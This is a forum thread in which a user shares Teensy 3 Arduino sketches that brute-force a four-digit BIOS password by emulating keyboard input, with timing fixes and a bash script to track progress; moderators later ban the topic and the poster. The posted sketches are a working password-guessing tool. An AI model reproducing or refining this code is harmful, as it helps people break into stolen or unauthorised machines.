BIOS Attack with Teensy

[orvtech]

Friends,

I am building a simple version of what Vince did with his arduino on http://www.alfersoft.com.ar/blog/2011/11/14/brute-force-attack-a-bios-with-arduino/ but using the Teensy 3.

I decided to start small and limited to a only 4 digit numeric password with a wait over 5 seconds between attempts. Here is the code I am using:

const int ledPin = 13; // choose the pin for the LED
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";

void setup() {
  pinMode(ledPin, OUTPUT); // declare LED as output 
  delay(10000);
  //  Serial.begin(9600);
}

void loop(){
  if (counter <= 9999){
    digitalWrite(ledPin, LOW);
    delay(5500);
    digitalWrite(ledPin, HIGH);
    delay( 500);
    sprintf(pin, "%04d", fakecounter);
    //Serial.print(pin);
    Keyboard.print(pin[0]);
    delay(300);
    Keyboard.print(pin[1]);
    delay(300);
    Keyboard.print(pin[2]);
    delay(300);
    Keyboard.println(pin[3]);
  }
//reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) { 
      digitalWrite(ledPin, HIGH);   
      delay(20);                  
      digitalWrite(ledPin, LOW);
      delay(200);  
    }   
    delay(6000); 
  }
  ++counter;
  fakecounter = counter;
}

As you can see from this video it works great over a text editor:

The problem is that when I try against my bios password It seems to just send one or tow characters and never sends the enter which I though it would be sent with the 'println'.

Any suggestion?

 

[orvtech]

I tested on a different brand machine and it worked.
Tested a USB keyboard on the target machine and worked.

I am beginning to think that this has to do with how long the key remains "pressed".

I found out about the Keyboard.press() and Keyboard.release() functions. My question is without using this how long does the process of pressing and releasing lasts?

 

[PaulStoffregen]

I found out about the Keyboard.press() and Keyboard.release() functions. My question is without using this how long does the process of pressing and releasing lasts?

If you use Keyboard.press() and Keyboard.release() with no delay between them, the packets are sent at the maximum rate. In USB, the host (your PC or Mac) always controls the timing of every USB packet. Teensy has a request for a 1 ms interval (the fastest possible) in its descriptors. However, certain versions of Windows and some BIOS firmware might ignore that request and use an 8 ms interval.

Regardless of the speed allowed by the USB host, there is packet buffering on Teensy. Teensy 2.0 buffers up to 2 outgoing packets, which is a fixed limit of the hardware. Teensy 3.0 can buffer many more. Currently, usb_keyboard.c has "#define TX_PACKET_LIMIT 4", but this limit can be changed easily. Calling Keyboard.press() generates 1 outgoing USB packet. So does Keyboard.release(). If an outgoing buffer is available, control will quickly return to your program. Otherwise, it will wait until a buffer becomes available.

When you use Keyboard.print("some text"), each character is transmitted as 2 USB packets, sent as rapidly as possible. If you're using an international keyboard layout that features dead key sequences, up to 4 packets may be sent for any special characters requiring a dead key sequence.

 

[orvtech]

ZTiK.nl, PaulStoffregen thank you both for your help!

I manage to get it working by inserting a delay in between, here is what is currently working for me:

#include <usb_keyboard.h>
const int ledPin = 13; // choose the pin for the LED
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";

void setup() {
  pinMode(ledPin, OUTPUT); // declare LED as output 
  delay(10000);

  //  Serial.begin(9600);
}

void loop(){
keyboard_modifier_keys = 0;
  if (counter <= 9999){
    delay(8000);
    digitalWrite(ledPin, LOW);
    delay(5500);
    digitalWrite(ledPin, HIGH);

    sprintf(pin, "%04d", fakecounter);
    Keyboard.press(pin[1]);
    delay(450);
    Keyboard.release(pin[1]);   
    
    delay(420);
    
    Keyboard.press(pin[1]);
    delay(398);
    Keyboard.release(pin[1]);
    
    delay(510);
    
    Keyboard.press(pin[2]);
    delay(421);
    Keyboard.release(pin[2]);
    
    delay(423);
    
    Keyboard.press(pin[3]);
    delay(430);
    Keyboard.release(pin[3]);
   
    delay(525);
   
    Keyboard.press(KEY_ENTER);
    delay(305);
    Keyboard.release(KEY_ENTER);
  }
//reached 4 digit PIN max value
  if (counter > 9999){
    for (int blinkies = 0; blinkies < 8; blinkies++) { 
      digitalWrite(ledPin, HIGH);   
      delay(20);                  
      digitalWrite(ledPin, LOW);
      delay(200);  
    }   
    delay(6000); 
  }
  ++counter;
  fakecounter = counter;
}

I was thinking about using a phototransirtor (excuse me if that is not the correct name) making contact with the screen for sensing when the screen has changed in a certain area (the submit button, or the machine has started to boot for example). Then log the las number to a sd card or some sort of non-volatile storage.

Something else that I would love to add is a small screen that this plays which is the current PIN being tested. so far I have been keeping track with a BASH script that I run on my desktop.Here is the script:

 cat ~/scripts/current.sh 
while true
do
clear
date
start=`date +%s -d "Mon Jan 14 18:17:00"`
current=`date +%s`; 
echo "Current PIN Between: " | tr '\n' ' '
echo "($current - $start) / 18.382" | bc | tr '\n' ' '
echo " and " | tr '\n' ' '
echo "($current - $start) / 17.382" | bc
sleep 2
done

I need to do some profiling on my teensy sketch, according to my calculations each attempt takes 17.382 seconds but I am not sure how long does each instruction takes (for example setting the LED on and off, and each instruction, etc..).
I figured it could not be more than a second in total but this second makes that the deviation gets bigger as the attempts increase.

So far this is my current output:

Tue Jan 15 12:16:01 PST 2013
Current PIN Between:  3521  and  3724

 

[Beginner]

Hi I was reading you post and was wandering if you sucseeded with adding the light sensor and pin display if you did could you please email me how you accomplished it as I would like to (if allowed) copy your design many thanks my email address is 1daddybrandon2012@gmail.com

 

[DemolishunWork]

Just out of curiosity isn't this on the same level as trying to get the password to a Mac machine? The reason I ask is because I have seen threads shutdown on here for asking about that.

I find these discussion interesting in that we all do stupid things with passwords sometimes so I don't mind the discussion. Sometimes in the industry we get a locked piece of equipment that we need to get into NOW. So I totally get the reasons behind this. It just seems like this would be one of those discussions that gets a warning or locked. Or is it just that a lot of people are trying to crack stolen laptops?

 

[robsoles]

Just out of curiosity isn't this on the same level as trying to get the password to a Mac machine? The reason I ask is because I have seen threads shutdown on here for asking about that.

...

+1 (forum software will not allow me to just post '+1')...

 

[stevech]

Surely not nefarious?

 

[DemolishunWork]

considering that most passwords can be turned off with a jumper on the motherboard...

 

[stevech]

considering that most passwords can be turned off with a jumper on the motherboard...

BIOS password goes with case padlock?

 

[DemolishunWork]

Yeah, a hacksaw to the place where the padlock attaches. or tin snips. padlock is just like Windows Defender. look impressive, you just go around it.

 

[Robin]

We do not support password guessing and it is not a topic that we want discussed here. Fundamentally we do not like censorship. Paul and I have had many discussions about censorship and forum activity. Password guessing is one of the very few topics we agree that we do not want discussed here and we will lock down threads on the topic.

 

[jephthai]

We do not support password guessing and it is not a topic that we want discussed here.

That seems harsh -- I am a penetration tester and information security researcher by trade, and I have used Teensy devices in my research. It's definitely your forum, and you guys get to do what you want, of course. Nevertheless, password guessing is a fundamental activity in testing security and compliance, and is completely legitimate when you own the device or are properly authorized.

 

[robsoles]

That seems harsh -- I am a penetration tester and information security researcher by trade, and I have used Teensy devices in my research. It's definitely your forum, and you guys get to do what you want, of course. Nevertheless, password guessing is a fundamental activity in testing security and compliance, and is completely legitimate when you own the device or are properly authorized.

"Penetration Testing" != "Password Guessing"

Find out the relationship(s) between password guessing algorithms and (genuine/proper) penetration testing and become aware that few who read your post are going to be willing to accept that you are a penetration tester (even as a hobby, let alone a trade).

Edit: Penetration testers acting on behalf of a client would naturally throw their best brute force password guessing methods at the client's resources as part of the service and also to see if anything leaked - of course they would, those that cannot roll their own need only buy any one of the excellent toolkits available for this sort of stuff.

If you are arguing any need to post source code for cracking 4 digit pins (or similes) in a forum like this then it is pretty difficult to believe you have very much penetration testing experience at all.

"The next paragraph isn't well considered on my part" is such an understatement considering that I've known pen-testers need to include password breaking methods when acting as a service for long enough.

Penetration testing is a matter of compromising systems (or software) without even using passwords. Nearest relationship to password guessing is where a penetration tester's tool might reveal a target's passwords without ever guessing in the slightest.


People posting code which is *any* good at guessing pins/passwords may help ONE poor fool who genuinely forgot their pin/password where it will more likely help MANY (MANY*MANY) criminals make greater profit from stolen devices.


As the OP for this thread has been subsequently banned I suggest a big fat padlock for this thread

 

[Robin]

We support White Hat security testing. There has been some great security research and testing done with Teensy boards and it can be discussed on the forum.

If I see a discussion started specifically on how to guess passwords, especially guessing 4-digit passwords, I will block and delete first and probably not ask questions later. If the post is something like "I got a Macbook from my *insert applicable relative here* and the password has been lost. How do I use your product to guess the password to unlock it?" there may be banning involved as well. If the discussion is along the lines of how to improve a system to prevent password guessing, that is something else entirely.

Bottom line - It's our forum and we don't like censorship. There are very few technical subjects that we won't allow. Discussions on how to guess passwords is one of them.